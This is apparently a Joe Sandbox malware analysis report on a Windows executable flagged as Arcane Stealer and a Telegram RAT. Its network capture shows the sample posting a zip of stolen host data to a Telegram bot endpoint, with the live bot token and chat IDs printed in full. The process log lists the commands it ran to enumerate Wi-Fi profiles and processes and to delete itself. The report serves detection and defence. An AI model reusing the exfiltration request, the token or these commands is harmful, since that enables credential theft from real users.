                                                                                        push edx
                                                                                        pop ecx
                                                                                        fcmovbe st(0), st(4)
                                                                                        mov esi, 74582D83h
                                                                                        and ebx, edx
                                                                                        dec ecx
                                                                                        loopne 00007F4AF471BFEBh
                                                                                        sub dword ptr [esi+7544C8C9h], ecx
                                                                                        retn 6A89h
                                                                                        hlt
                                                                                        mov seg?, word ptr [ecx+78h]
                                                                                        cdq
                                                                                        pop eax
                                                                                        imul esp, dword ptr [edi], B9h
                                                                                        jno 00007F4AF471BF5Fh
                                                                                        mov esi, F0B64FE1h
                                                                                        mov byte ptr [ebp-53DF36E9h], ch
                                                                                        jnl 0000BF51h
                                                                                        cmp dh, byte ptr [ebx-1AE7B521h]
                                                                                        sbb dh, byte ptr [ecx]
                                                                                        adc byte ptr [edi+62603351h], 00000053h
                                                                                        jnle 00007F4AF471BFC7h
                                                                                        mov cl, 64h
                                                                                        jnbe 00007F4AF471BF62h
                                                                                        mov ebx, FE84AE6Bh
                                                                                        and dword ptr [eax+2B08F91Ch], 00487094h
                                                                                         Name | Virtual Address | Virtual Size | Is in Section
                                                                                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2a5b0 | 0x4f | .text
                                                                                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x5d0 | .rsrc
                                                                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e000 | 0xc | .reloc
                                                                                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2a514 | 0x38 | .text
                                                                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                         Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                         .text | 0x2000 | 0x29068 | 0x29200 | 76b77f85cd4aa4ab9dddb98589135bef | False | 0.4165202317629179 | data | 5.80755836163704 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                         .rsrc | 0x2c000 | 0x5d0 | 0x600 | f08edb0240cdcebdcca1b93f0f59732a | False | 0.4427083333333333 | data | 4.28181878845981 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                         .reloc | 0x2e000 | 0xc | 0x200 | 0f9136305b308c6636cd9d39e281f797 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                         Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                         RT_VERSION | 0x2c090 | 0x340 | data | | | 0.45072115384615385
                                                                                         RT_MANIFEST | 0x2c3e0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                                                         DLL | Import
                                                                                         mscoree.dll | _CorExeMain
                                                                                         Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                         2024-12-17T19:47:11.098387+0100 | 2843856 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 | 1 | 192.168.2.5 | 49708 | 149.154.167.220 | 443 | TCP
                                                                                         2024-12-17T19:47:12.021049+0100 | 2039009 | ET MALWARE Win32/SaintStealer CnC Response | 1 | 149.154.167.220 | 443 | 192.168.2.5 | 49708 | TCP
                                                                                         Note: 149.154.167.220 (TCP 443) lies in Telegram's 149.154.160.0/20 allocation, the range api.telegram.org resolves into, so the alerted POST is consistent with a Telegram Bot API upload rather than a dedicated panel; the "SaintStealer CnC Response" SID matches the server's reply pattern and is not a family attribution. 104.16.184.241 (TCP 80) is a Cloudflare-fronted address. Neither IP is a useful block-list indicator on its own.
                                                                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                         Dec 17, 2024 19:47:00.098370075 CET | 49704 | 80 | 192.168.2.5 | 104.16.184.241
                                                                                         Dec 17, 2024 19:47:00.221230984 CET | 80 | 49704 | 104.16.184.241 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:00.221339941 CET | 49704 | 80 | 192.168.2.5 | 104.16.184.241
                                                                                         Dec 17, 2024 19:47:00.221699953 CET | 49704 | 80 | 192.168.2.5 | 104.16.184.241
                                                                                         Dec 17, 2024 19:47:00.341557026 CET | 80 | 49704 | 104.16.184.241 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:01.323802948 CET | 80 | 49704 | 104.16.184.241 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:01.367625952 CET | 49704 | 80 | 192.168.2.5 | 104.16.184.241
                                                                                         Dec 17, 2024 19:47:09.018275023 CET | 49708 | 443 | 192.168.2.5 | 149.154.167.220
                                                                                         Dec 17, 2024 19:47:09.018327951 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:09.019009113 CET | 49708 | 443 | 192.168.2.5 | 149.154.167.220
                                                                                         Dec 17, 2024 19:47:09.062027931 CET | 49708 | 443 | 192.168.2.5 | 149.154.167.220
                                                                                         Dec 17, 2024 19:47:09.062047958 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:10.454997063 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:10.455311060 CET | 49708 | 443 | 192.168.2.5 | 149.154.167.220
                                                                                         Dec 17, 2024 19:47:10.498305082 CET | 49708 | 443 | 192.168.2.5 | 149.154.167.220
                                                                                         Dec 17, 2024 19:47:10.498375893 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:10.499399900 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:10.664638042 CET | 49708 | 443 | 192.168.2.5 | 149.154.167.220
                                                                                         Dec 17, 2024 19:47:10.697889090 CET | 49708 | 443 | 192.168.2.5 | 149.154.167.220
                                                                                         Dec 17, 2024 19:47:10.722799063 CET | 49704 | 80 | 192.168.2.5 | 104.16.184.241
                                                                                         Dec 17, 2024 19:47:10.739337921 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:10.843352079 CET | 80 | 49704 | 104.16.184.241 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:10.843415022 CET | 49704 | 80 | 192.168.2.5 | 104.16.184.241
                                                                                         Dec 17, 2024 19:47:11.091777086 CET | 49708 | 443 | 192.168.2.5 | 149.154.167.220
                                                                                         Dec 17, 2024 19:47:11.091823101 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:11.097846031 CET | 49708 | 443 | 192.168.2.5 | 149.154.167.220
                                                                                         Dec 17, 2024 19:47:11.097872972 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:11.097984076 CET | 49708 | 443 | 192.168.2.5 | 149.154.167.220
                                                                                         Dec 17, 2024 19:47:11.097992897 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:11.098026037 CET | 49708 | 443 | 192.168.2.5 | 149.154.167.220
                                                                                         Dec 17, 2024 19:47:11.098031998 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:11.098058939 CET | 49708 | 443 | 192.168.2.5 | 149.154.167.220
                                                                                         Dec 17, 2024 19:47:11.098064899 CET | 443 | 49708 | 149.154.167.220 | 192.168.2.5
                                                                                         Dec 17, 2024 19:47:11.098088980 CET | 49708 | 443 | 192.168.2.5 | 149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098097086 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098118067 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098125935 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098156929 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098165035 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098181009 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098189116 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098226070 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098232031 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098315001 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098321915 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098398924 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098407030 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098464966 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098472118 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098543882 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098548889 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098589897 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098596096 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098690033 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098699093 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098718882 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098731995 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098732948 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098757982 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098778009 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098783970 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098814011 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098819971 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098859072 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098865986 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098932028 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098938942 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.098974943 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.098980904 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.099057913 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.099064112 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.099217892 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:11.099222898 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.111116886 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:11.199177980 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:12.018671036 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:12.020418882 CET49708443192.168.2.5149.154.167.220
                                                                                        Dec 17, 2024 19:47:12.020555973 CET44349708149.154.167.220192.168.2.5
                                                                                        Dec 17, 2024 19:47:12.020634890 CET49708443192.168.2.5149.154.167.220
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 17, 2024 19:46:59.868026972 CET  63959        53         192.168.2.5  1.1.1.1
Dec 17, 2024 19:47:00.005353928 CET  53           63959      1.1.1.1      192.168.2.5
Dec 17, 2024 19:47:01.873634100 CET  51168        53         192.168.2.5  1.1.1.1
Dec 17, 2024 19:47:02.026310921 CET  53           51168      1.1.1.1      192.168.2.5
Dec 17, 2024 19:47:08.873595953 CET  60506        53         192.168.2.5  1.1.1.1
Dec 17, 2024 19:47:09.011013985 CET  53           60506      1.1.1.1      192.168.2.5
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                     Type                  Class        DNS over HTTPS
Dec 17, 2024 19:46:59.868026972 CET  192.168.2.5  1.1.1.1  0x2296    Standard query (0)  icanhazip.com            A (IP address)        IN (0x0001)  false
Dec 17, 2024 19:47:01.873634100 CET  192.168.2.5  1.1.1.1  0xc8d     Standard query (0)  238.14.8.0.in-addr.arpa  PTR (Pointer record)  IN (0x0001)  false
Dec 17, 2024 19:47:08.873595953 CET  192.168.2.5  1.1.1.1  0xc4c4    Standard query (0)  api.telegram.org         A (IP address)        IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                     CName  Address          Type                  Class        DNS over HTTPS
Dec 17, 2024 19:47:00.005353928 CET  1.1.1.1    192.168.2.5  0x2296    No error (0)    icanhazip.com                   104.16.184.241   A (IP address)        IN (0x0001)  false
Dec 17, 2024 19:47:00.005353928 CET  1.1.1.1    192.168.2.5  0x2296    No error (0)    icanhazip.com                   104.16.185.241   A (IP address)        IN (0x0001)  false
Dec 17, 2024 19:47:02.026310921 CET  1.1.1.1    192.168.2.5  0xc8d     Name error (3)  238.14.8.0.in-addr.arpa  none   none             PTR (Pointer record)  IN (0x0001)  false
Dec 17, 2024 19:47:09.011013985 CET  1.1.1.1    192.168.2.5  0xc4c4    No error (0)    api.telegram.org                149.154.167.220  A (IP address)        IN (0x0001)  false
                                                                                        • api.telegram.org
                                                                                        • icanhazip.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49704        104.16.184.241  80                1352  C:\Users\user\Desktop\zyEDYRU0jw.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 17, 2024 19:47:00.221699953 CET  63                 OUT        GET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive
Dec 17, 2024 19:47:01.323802948 CET  535                IN         HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 18:47:01 GMT
Content-Type: text/plain
Content-Length: 13
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=5vYa03N7BbqR9KmIecf_rtCGeGVKBqLLgyUZy44__5s-1734461221-1.0.1.1-0_qB8YAWU8UOaTQu3HLSF65yHJCeVHu0HgPXswDR.F9z6bt2M4uXBpyh3EI5ARbRnisjZxSNTagL9Ei2QsiD4w; path=/; expires=Tue, 17-Dec-24 19:17:01 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 8f3914484ee64332-EWR
alt-svc: h3=":443"; ma=86400
Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a
Data Ascii: 8.46.123.189


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.5  49708        149.154.167.220  443               1352  C:\Users\user\Desktop\zyEDYRU0jw.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-17 18:47:10 UTC  258                OUT        POST /bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary="6b29678b-5dd7-4ef1-9acd-f26ecdf2bb88"
Host: api.telegram.org
Content-Length: 89443
Expect: 100-continue
Connection: Keep-Alive
2024-12-17 18:47:11 UTC  40                 OUT        Data Raw: 2d 2d 36 62 32 39 36 37 38 62 2d 35 64 64 37 2d 34 65 66 31 2d 39 61 63 64 2d 66 32 36 65 63 64 66 32 62 62 38 38 0d 0a
Data Ascii: --6b29678b-5dd7-4ef1-9acd-f26ecdf2bb88
2024-12-17 18:47:11 UTC  125                OUT        Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 45 4e 5d 38 2e 34 36 2e 31 32 33 2e 31 38 39 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 25 35 42 45 4e 25 35 44 38 2e 34 36 2e 31 32 33 2e 31 38 39 2e 7a 69 70 0d 0a 0d 0a
Data Ascii: Content-Disposition: form-data; name=document; filename="[EN]8.46.123.189.zip"; filename*=utf-8''%5BEN%5D8.46.123.189.zip
                                                                                        2024-12-17 18:47:11 UTC4096OUTData Raw: 50 4b 03 04 14 00 00 00 08 00 dc 6d 91 59 4d 98 f4 36 1f 00 00 00 1d 00 00 00 0e 00 00 00 50 72 6f 64 75 63 74 4b 65 79 2e 74 78 74 b3 34 8f 70 33 d2 f5 0b 32 31 8e d0 0d f1 b6 88 f4 d5 f5 0e 33 77 f7 d5 0d 30 0e 0f 8b 00 00 50 4b 03 04 14 00 00 00 08 00 dd 6d 91 59 7e 4b ef fb e5 00 00 00 e2 02 00 00 15 00 00 00 49 6e 73 74 61 6c 6c 65 64 42 72 6f 77 73 65 72 73 2e 74 78 74 ed 90 31 6f c2 30 10 85 67 e7 57 78 84 c5 3a 07 13 42 b7 16 b5 a8 03 15 53 59 6e b1 c2 25 58 72 72 91 93 4a 11 bf be 2e 81 aa 25 73 b7 4e b6 de 7b fe fc ee de 6c 4d 62 6f fb 93 78 a7 d0 39 6e 92 1d 9f 9d f7 56 be b8 40 25 0f 62 f3 80 fb c0 55 b0 75 94 3c 75 78 17 c0 72 3c 15 0d 24 b4 ce 15 28 9d 6c 99 2b 4f 72 73 0a 1c f9 13 c4 68 e3 68 e3 63 db 7a 57 d8 3e fe 8e c5 45 ba b2 56 91 b5
                                                                                        Data Ascii: PKmYM6ProductKey.txt4p3213w0PKmY~KInstalledBrowsers.txt1o0gWx:BSYn%XrrJ.%sN{lMbox9nV@%bUu<uxr<$(l+OrshhczW>EV
2024-12-17 18:47:11 UTC  25                 IN         HTTP/1.1 100 Continue
2024-12-17 18:47:12 UTC  859                IN         HTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Tue, 17 Dec 2024 18:47:11 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 471
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":true,"result":{"message_id":1093,"from":{"id":7501458999,"is_bot":true,"first_name":"AYE BOT)","username":"gfhsd68ybufaFGDHSufhbjsn_bot"},"chat":{"id":7768810529,"first_name":"Has been seized","username":"Taldic","type":"private"},"date":1734461231,"document":{"file_name":"[EN]8.46.123.189.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIERWdhxy_VffYO4OjAeOUq4rb_OESJAAJaFQAC2JEQU5Adm_zQ4ujnNgQ","file_unique_id":"AgADWhUAAtiREFM","file_size":89093}}}


Target ID: 0
Start time: 13:46:57
Start date: 17/12/2024
Path: C:\Users\user\Desktop\zyEDYRU0jw.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\zyEDYRU0jw.exe"
Imagebase: 0x650000
File size: 171'008 bytes
MD5 hash: 41D3660B5321768122F4C25AC9868FC3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Arcane, Description: Yara detected Arcane Stealer, Source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2250498152.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 3
Start time: 13:47:04
Start date: 17/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                        Target ID:4
                                                                                        Start time:13:47:04
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:13:47:05
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\chcp.com
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:chcp 65001
                                                                                        Imagebase:0xbd0000
                                                                                        File size:12'800 bytes
                                                                                        MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:13:47:05
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\netsh.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:netsh wlan show profiles
                                                                                        Imagebase:0x1080000
                                                                                        File size:82'432 bytes
                                                                                        MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:13:47:05
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:findstr All
                                                                                        Imagebase:0x350000
                                                                                        File size:29'696 bytes
                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:13:47:05
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"cmd.exe" /c tasklist
                                                                                        Imagebase:0x790000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:13:47:05
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:13:47:05
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:tasklist
                                                                                        Imagebase:0xdf0000
                                                                                        File size:79'360 bytes
                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:12
                                                                                        Start time:13:47:15
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat
                                                                                        Imagebase:0x790000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:13:47:15
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:13:47:16
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\chcp.com
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:chcp 65001
                                                                                        Imagebase:0xbd0000
                                                                                        File size:12'800 bytes
                                                                                        MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:16
                                                                                        Start time:13:47:16
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:TaskKill /F /IM 1352
                                                                                        Imagebase:0x390000
                                                                                        File size:74'240 bytes
                                                                                        MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:18
                                                                                        Start time:13:47:16
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:Timeout /T 2 /Nobreak
                                                                                        Imagebase:0x1e0000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:19
                                                                                        Start time:13:47:16
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 3228
                                                                                        Imagebase:0x960000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true


                                                                                          Execution Graph

                                                                                          Execution Coverage:15.1%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:3.3%
                                                                                          Total number of Nodes:91
                                                                                          Total number of Limit Nodes:4
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06D047CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
